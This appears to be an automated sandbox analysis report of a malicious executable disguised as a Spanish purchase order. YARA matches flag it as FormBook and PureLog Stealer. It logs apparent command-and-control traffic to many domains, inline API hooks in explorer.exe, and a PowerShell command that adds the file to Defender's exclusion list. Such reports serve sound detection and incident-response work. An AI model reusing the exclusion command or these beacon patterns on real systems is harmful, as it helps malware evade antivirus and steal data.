Feb 28, 2024 14:57:03.402381897 CET	49718	80	192.168.2.7	172.104.233.69
Feb 28, 2024 14:57:03.499624968 CET	49718	80	192.168.2.7	172.104.233.69
Feb 28, 2024 14:57:03.682423115 CET	80	49718	172.104.233.69	192.168.2.7
Feb 28, 2024 14:57:24.089071035 CET	49719	80	192.168.2.7	13.228.106.35
Feb 28, 2024 14:57:24.409876108 CET	80	49719	13.228.106.35	192.168.2.7
Feb 28, 2024 14:57:24.410033941 CET	49719	80	192.168.2.7	13.228.106.35
Feb 28, 2024 14:57:24.410156012 CET	49719	80	192.168.2.7	13.228.106.35
Feb 28, 2024 14:57:24.731004000 CET	80	49719	13.228.106.35	192.168.2.7
Feb 28, 2024 14:57:24.731797934 CET	80	49719	13.228.106.35	192.168.2.7
Feb 28, 2024 14:57:24.731812954 CET	80	49719	13.228.106.35	192.168.2.7
Feb 28, 2024 14:57:24.731911898 CET	49719	80	192.168.2.7	13.228.106.35
Feb 28, 2024 14:57:24.731954098 CET	49719	80	192.168.2.7	13.228.106.35
Feb 28, 2024 14:57:25.052743912 CET	80	49719	13.228.106.35	192.168.2.7
Feb 28, 2024 14:58:04.077878952 CET	49720	80	192.168.2.7	3.33.130.190
Feb 28, 2024 14:58:04.170378923 CET	80	49720	3.33.130.190	192.168.2.7
Feb 28, 2024 14:58:04.170454025 CET	49720	80	192.168.2.7	3.33.130.190
Feb 28, 2024 14:58:04.170586109 CET	49720	80	192.168.2.7	3.33.130.190
Feb 28, 2024 14:58:04.262988091 CET	80	49720	3.33.130.190	192.168.2.7
Feb 28, 2024 14:58:04.264493942 CET	80	49720	3.33.130.190	192.168.2.7
Feb 28, 2024 14:58:04.264530897 CET	80	49720	3.33.130.190	192.168.2.7
Feb 28, 2024 14:58:04.264631033 CET	49720	80	192.168.2.7	3.33.130.190
Feb 28, 2024 14:58:04.264666080 CET	49720	80	192.168.2.7	3.33.130.190
Feb 28, 2024 14:58:04.272202969 CET	80	49720	3.33.130.190	192.168.2.7
Feb 28, 2024 14:58:04.272270918 CET	49720	80	192.168.2.7	3.33.130.190
Feb 28, 2024 14:58:04.357213020 CET	80	49720	3.33.130.190	192.168.2.7
Feb 28, 2024 14:58:24.487910986 CET	49721	80	192.168.2.7	103.224.212.213
Feb 28, 2024 14:58:24.644680977 CET	80	49721	103.224.212.213	192.168.2.7
Feb 28, 2024 14:58:24.644752026 CET	49721	80	192.168.2.7	103.224.212.213
Feb 28, 2024 14:58:24.644871950 CET	49721	80	192.168.2.7	103.224.212.213
Feb 28, 2024 14:58:24.829653025 CET	80	49721	103.224.212.213	192.168.2.7
Feb 28, 2024 14:58:24.829674006 CET	80	49721	103.224.212.213	192.168.2.7
Feb 28, 2024 14:58:24.829785109 CET	49721	80	192.168.2.7	103.224.212.213
Feb 28, 2024 14:58:24.829818964 CET	49721	80	192.168.2.7	103.224.212.213
Feb 28, 2024 14:58:24.986521006 CET	80	49721	103.224.212.213	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 28, 2024 14:55:21.165432930 CET	53878	53	192.168.2.7	1.1.1.1
Feb 28, 2024 14:55:21.391565084 CET	53	53878	1.1.1.1	192.168.2.7
Feb 28, 2024 14:55:41.524226904 CET	51392	53	192.168.2.7	1.1.1.1
Feb 28, 2024 14:55:41.785398006 CET	53	51392	1.1.1.1	192.168.2.7
Feb 28, 2024 14:56:00.915092945 CET	64655	53	192.168.2.7	1.1.1.1
Feb 28, 2024 14:56:01.045962095 CET	53	64655	1.1.1.1	192.168.2.7
Feb 28, 2024 14:56:21.073894024 CET	64615	53	192.168.2.7	1.1.1.1
Feb 28, 2024 14:56:21.203222990 CET	53	64615	1.1.1.1	192.168.2.7
Feb 28, 2024 14:56:41.775393009 CET	63225	53	192.168.2.7	1.1.1.1
Feb 28, 2024 14:56:42.258101940 CET	53	63225	1.1.1.1	192.168.2.7
Feb 28, 2024 14:57:02.415312052 CET	56154	53	192.168.2.7	1.1.1.1
Feb 28, 2024 14:57:02.548829079 CET	53	56154	1.1.1.1	192.168.2.7
Feb 28, 2024 14:57:22.806068897 CET	59247	53	192.168.2.7	1.1.1.1
Feb 28, 2024 14:57:23.806196928 CET	59247	53	192.168.2.7	1.1.1.1
Feb 28, 2024 14:57:24.087719917 CET	53	59247	1.1.1.1	192.168.2.7
Feb 28, 2024 14:57:24.087740898 CET	53	59247	1.1.1.1	192.168.2.7
Feb 28, 2024 14:58:03.868804932 CET	62483	53	192.168.2.7	1.1.1.1
Feb 28, 2024 14:58:04.076914072 CET	53	62483	1.1.1.1	192.168.2.7
Feb 28, 2024 14:58:24.227978945 CET	59545	53	192.168.2.7	1.1.1.1
Feb 28, 2024 14:58:24.486865044 CET	53	59545	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 28, 2024 14:55:21.165432930 CET	192.168.2.7	1.1.1.1	0x6a9c	Standard query (0)	www.ytytyt016.xyz	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:55:41.524226904 CET	192.168.2.7	1.1.1.1	0xf184	Standard query (0)	www.aloyoga-uae.com	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:56:00.915092945 CET	192.168.2.7	1.1.1.1	0xbd9e	Standard query (0)	www.kxn.ink	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:56:21.073894024 CET	192.168.2.7	1.1.1.1	0x176f	Standard query (0)	www.nordens-media.com	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:56:41.775393009 CET	192.168.2.7	1.1.1.1	0x312	Standard query (0)	www.thewipglobal.com	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:57:02.415312052 CET	192.168.2.7	1.1.1.1	0xa9e5	Standard query (0)	www.boostyourselftoday.com	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:57:22.806068897 CET	192.168.2.7	1.1.1.1	0x2f14	Standard query (0)	www.yobo-by.com	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:57:23.806196928 CET	192.168.2.7	1.1.1.1	0x2f14	Standard query (0)	www.yobo-by.com	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:58:03.868804932 CET	192.168.2.7	1.1.1.1	0xa1be	Standard query (0)	www.rdlva.com	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:58:24.227978945 CET	192.168.2.7	1.1.1.1	0xc105	Standard query (0)	www.yassa-hany.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 28, 2024 14:55:21.391565084 CET	1.1.1.1	192.168.2.7	0x6a9c	No error (0)	www.ytytyt016.xyz	51yt-nlb-8ea864e2717dc817.elb.ap-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 28, 2024 14:55:21.391565084 CET	1.1.1.1	192.168.2.7	0x6a9c	No error (0)	51yt-nlb-8ea864e2717dc817.elb.ap-east-1.amazonaws.com		18.167.179.176	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:55:21.391565084 CET	1.1.1.1	192.168.2.7	0x6a9c	No error (0)	51yt-nlb-8ea864e2717dc817.elb.ap-east-1.amazonaws.com		43.198.64.213	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:55:21.391565084 CET	1.1.1.1	192.168.2.7	0x6a9c	No error (0)	51yt-nlb-8ea864e2717dc817.elb.ap-east-1.amazonaws.com		18.167.58.141	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:55:41.785398006 CET	1.1.1.1	192.168.2.7	0xf184	No error (0)	www.aloyoga-uae.com		3.96.23.237	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:56:01.045962095 CET	1.1.1.1	192.168.2.7	0xbd9e	No error (0)	www.kxn.ink		104.21.12.188	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:56:01.045962095 CET	1.1.1.1	192.168.2.7	0xbd9e	No error (0)	www.kxn.ink		172.67.132.76	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:56:21.203222990 CET	1.1.1.1	192.168.2.7	0x176f	No error (0)	www.nordens-media.com	nordens-media.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 28, 2024 14:56:21.203222990 CET	1.1.1.1	192.168.2.7	0x176f	No error (0)	nordens-media.com		15.197.142.173	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:56:21.203222990 CET	1.1.1.1	192.168.2.7	0x176f	No error (0)	nordens-media.com		3.33.152.147	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:56:42.258101940 CET	1.1.1.1	192.168.2.7	0x312	No error (0)	www.thewipglobal.com		15.197.130.221	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:57:02.548829079 CET	1.1.1.1	192.168.2.7	0xa9e5	No error (0)	www.boostyourselftoday.com	boostyourselftoday.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 28, 2024 14:57:02.548829079 CET	1.1.1.1	192.168.2.7	0xa9e5	No error (0)	boostyourselftoday.com		172.104.233.69	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:57:24.087719917 CET	1.1.1.1	192.168.2.7	0x2f14	No error (0)	www.yobo-by.com	giikin-shangcheng-jingling-3-2041841048.ap-southeast-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 28, 2024 14:57:24.087719917 CET	1.1.1.1	192.168.2.7	0x2f14	No error (0)	giikin-shangcheng-jingling-3-2041841048.ap-southeast-1.elb.amazonaws.com		13.228.106.35	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:57:24.087719917 CET	1.1.1.1	192.168.2.7	0x2f14	No error (0)	giikin-shangcheng-jingling-3-2041841048.ap-southeast-1.elb.amazonaws.com		18.142.217.119	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:57:24.087740898 CET	1.1.1.1	192.168.2.7	0x2f14	No error (0)	www.yobo-by.com	giikin-shangcheng-jingling-3-2041841048.ap-southeast-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 28, 2024 14:57:24.087740898 CET	1.1.1.1	192.168.2.7	0x2f14	No error (0)	giikin-shangcheng-jingling-3-2041841048.ap-southeast-1.elb.amazonaws.com		13.228.106.35	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:57:24.087740898 CET	1.1.1.1	192.168.2.7	0x2f14	No error (0)	giikin-shangcheng-jingling-3-2041841048.ap-southeast-1.elb.amazonaws.com		18.142.217.119	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:58:04.076914072 CET	1.1.1.1	192.168.2.7	0xa1be	No error (0)	www.rdlva.com	rdlva.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 28, 2024 14:58:04.076914072 CET	1.1.1.1	192.168.2.7	0xa1be	No error (0)	rdlva.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:58:04.076914072 CET	1.1.1.1	192.168.2.7	0xa1be	No error (0)	rdlva.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Feb 28, 2024 14:58:24.486865044 CET	1.1.1.1	192.168.2.7	0xc105	No error (0)	www.yassa-hany.online		103.224.212.213	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.ytytyt016.xyz

www.aloyoga-uae.com

www.kxn.ink

www.nordens-media.com

www.thewipglobal.com

www.boostyourselftoday.com

www.yobo-by.com

www.rdlva.com

www.yassa-hany.online

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49711	18.167.179.176	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 14:55:21.703258991 CET	165	OUT	GET /pz08/?cx=jtuLWRsQ7h/kdQWA3jOYD6sQTdy8Hpo6TuBbTJkxtbgc8qtuAyjytUGgDBD8ARNIyniRVdyhSg==&CR=_DHhAtX HTTP/1.1 Host: www.ytytyt016.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 28, 2024 14:55:22.011445045 CET	447	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 28 Feb 2024 13:55:21 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.ytytyt016.xyz/pz08/?cx=jtuLWRsQ7h/kdQWA3jOYD6sQTdy8Hpo6TuBbTJkxtbgc8qtuAyjytUGgDBD8ARNIyniRVdyhSg==&CR=_DHhAtX Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49713	3.96.23.237	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 14:55:41.893387079 CET	167	OUT	GET /pz08/?cx=9YX7L4oFB3/EoPBGuEUMKmowUgzTtecO6ANZQ1SJSnxFJE2hiNf1weaUCMKGubsbt86VGUGPQA==&CR=_DHhAtX HTTP/1.1 Host: www.aloyoga-uae.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 28, 2024 14:55:42.000164032 CET	512	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 28 Feb 2024 13:55:41 GMT Content-Type: text/html; charset=utf-8 Content-Length: 85 Connection: close X-date: 2024-02-22T21:57:48+00:00 X-Content-Type-Options: nosniff Expires: Thu, 29 Feb 2024 21:57:48 +0000 Cache-Control: public, max-age=604800 Location: https://www.aloyoga.com/ X-Xss-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Cached: HIT Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 20 6f 6e 6c 6f 61 64 3d 22 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6c 6f 79 6f 67 61 2e 63 6f 6d 2f 27 22 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body onload="document.location.href='https://www.aloyoga.com/'"></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49715	104.21.12.188	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 14:56:01.170609951 CET	159	OUT	GET /pz08/?cx=U4nNGnww1kjxOKScgSk+uScuMskua2ucq9ipsnk6Ch7erOE2tdRqmLDXrgubFDKibExXjkNZ4A==&CR=_DHhAtX HTTP/1.1 Host: www.kxn.ink Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 28, 2024 14:56:01.334677935 CET	557	IN	HTTP/1.1 404 Not Found Date: Wed, 28 Feb 2024 13:56:01 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 9 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Bx9nK6ndDF2UVpxmF3GIUFSCGRSrM7hD0Jqw7lNyNch%2BHrEuUYJwyNl%2BsChtHmoCrEjH0I3TOEKqI9HzaMw3iyz1Ry3Nhj2L%2BjAe85GNWEc08%2BUj3bRZ8xOBnjKjFA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 85c92b239cd2393a-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 4e 6f 74 20 66 6f 75 6e 64 Data Ascii: Not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49716	15.197.142.173	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 14:56:21.301234961 CET	169	OUT	GET /pz08/?cx=32Qm6Ke2HKMNxWuGOo4gUstP0NhHa1GW0Wc3g6Bmqj6dA0nbRKEtQTutVOb61eG0z72pbUCjvw==&CR=_DHhAtX HTTP/1.1 Host: www.nordens-media.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 28, 2024 14:56:21.394699097 CET	266	IN	HTTP/1.1 403 Forbidden Server: awselb/2.0 Date: Wed, 28 Feb 2024 13:56:21 GMT Content-Type: text/html Content-Length: 118 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49717	15.197.130.221	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 14:56:42.351336002 CET	168	OUT	GET /pz08/?cx=j7VZTyaPLotDIgtvuFm1Wc2ZOg86ksyi3hYWattYqpUq5IzwEATKEtPTRIq3N3amsDpuvgSkbA==&CR=_DHhAtX HTTP/1.1 Host: www.thewipglobal.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 28, 2024 14:56:42.565313101 CET	312	IN	HTTP/1.1 403 Forbidden Date: Wed, 28 Feb 2024 13:56:42 GMT Content-Type: text/html Content-Length: 146 Connection: close Server: nginx Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49718	172.104.233.69	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 14:57:02.918467045 CET	174	OUT	GET /pz08/?cx=0FaXmte0/P3knfwA0sMIwS1mD7E8vQQWGPcDD9zpFFyhOAUFaj5MXy9fjN6AdDBGShPY7E+43Q==&CR=_DHhAtX HTTP/1.1 Host: www.boostyourselftoday.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 28, 2024 14:57:03.396889925 CET	443	IN	HTTP/1.1 301 Moved Permanently Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 x-redirect-by: WordPress location: http://boostyourselftoday.com/pz08/?cx=0FaXmte0/P3knfwA0sMIwS1mD7E8vQQWGPcDD9zpFFyhOAUFaj5MXy9fjN6AdDBGShPY7E+43Q==&CR=_DHhAtX content-length: 0 date: Wed, 28 Feb 2024 13:57:03 GMT server: LiteSpeed vary: User-Agent

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49719	13.228.106.35	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 14:57:24.410156012 CET	163	OUT	GET /pz08/?cx=iU/VPDM1hXdODhSoU7U2JopiHjlxkOyRWPhUw/eyvzY6Otnmd1rCkE8jNVWF6hpsFcjAQEEsrA==&CR=_DHhAtX HTTP/1.1 Host: www.yobo-by.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 28, 2024 14:57:24.731797934 CET	785	IN	HTTP/1.1 403 Forbidden Server: awselb/2.0 Date: Wed, 28 Feb 2024 13:57:24 GMT Content-Type: text/html Content-Length: 118 Connection: close Set-Cookie: AWSALBTG=NS0vl/nza4XrlBrxo9sozNHchfYtqQ0GHoh3ll7hy+Q6+MjBhfzp1LuA5P+nivzgriz1HGM8gtsF4KX/KJcqXMLDjGBedBekzlEu+rfYz7Bg48nOOWiT/P7gxOUL74MLBzpZBEFagXa6dw2II47xPyomPV2Ke79MTma+7aPJnVy3eJM7jNg=; Expires=Wed, 06 Mar 2024 13:57:24 GMT; Path=/ Set-Cookie: AWSALBTGCORS=NS0vl/nza4XrlBrxo9sozNHchfYtqQ0GHoh3ll7hy+Q6+MjBhfzp1LuA5P+nivzgriz1HGM8gtsF4KX/KJcqXMLDjGBedBekzlEu+rfYz7Bg48nOOWiT/P7gxOUL74MLBzpZBEFagXa6dw2II47xPyomPV2Ke79MTma+7aPJnVy3eJM7jNg=; Expires=Wed, 06 Mar 2024 13:57:24 GMT; Path=/; SameSite=None Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49720	3.33.130.190	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 14:58:04.170586109 CET	161	OUT	GET /pz08/?cx=sHUCYmOOLAoNE4y8/5cjc5MBwdY8WEAoN/4wEGeHNPnX/dfJjUbL6GitjPJCVlt1GculRFq7FA==&CR=_DHhAtX HTTP/1.1 Host: www.rdlva.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 28, 2024 14:58:04.264493942 CET	304	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Wed, 28 Feb 2024 13:58:04 GMT Content-Type: text/plain Content-Length: 0 Connection: close Location: https://www.rdlva.com/pz08/?cx=sHUCYmOOLAoNE4y8/5cjc5MBwdY8WEAoN/4wEGeHNPnX/dfJjUbL6GitjPJCVlt1GculRFq7FA==&CR=_DHhAtX ETag: "65dd12f1-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49721	103.224.212.213	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 14:58:24.644871950 CET	169	OUT	GET /pz08/?cx=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMZpBqNAn8DKeRhHzw==&CR=_DHhAtX HTTP/1.1 Host: www.yassa-hany.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 28, 2024 14:58:24.829653025 CET	433	IN	HTTP/1.1 302 Found date: Wed, 28 Feb 2024 13:58:24 GMT server: Apache set-cookie: __tad=1709128704.8685536; expires=Sat, 25-Feb-2034 13:58:24 GMT; Max-Age=315360000 location: http://ww25.yassa-hany.online/pz08/?cx=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMZpBqNAn8DKeRhHzw==&CR=_DHhAtX&subid1=20240229-0058-24ae-ba57-9c10bec0e2f9 content-length: 2 content-type: text/html; charset=UTF-8 connection: close Data Raw: 0a 0a Data Ascii:

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xE0
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xE0
GetMessageW	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xE0
GetMessageA	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xE0

Target ID:	2
Start time:	14:54:32
Start date:	28/02/2024
Path:	C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe
Imagebase:	0x3f0000
File size:	711'680 bytes
MD5 hash:	EEC85A3805BCA7A05B1E669F3A043BC6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.1394754443.0000000002763000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.1394754443.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.1402312929.00000000072E2000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.1394754443.0000000002721000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1397158259.0000000004104000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1397158259.0000000004104000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1397158259.0000000004104000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1397158259.0000000004104000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1397158259.0000000004104000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Target ID:	4
Start time:	14:54:39
Start date:	28/02/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe
Imagebase:	0x1a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	14:54:39
Start date:	28/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	14:54:39
Start date:	28/02/2024
Path:	C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe
Imagebase:	0xb80000
File size:	711'680 bytes
MD5 hash:	EEC85A3805BCA7A05B1E669F3A043BC6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
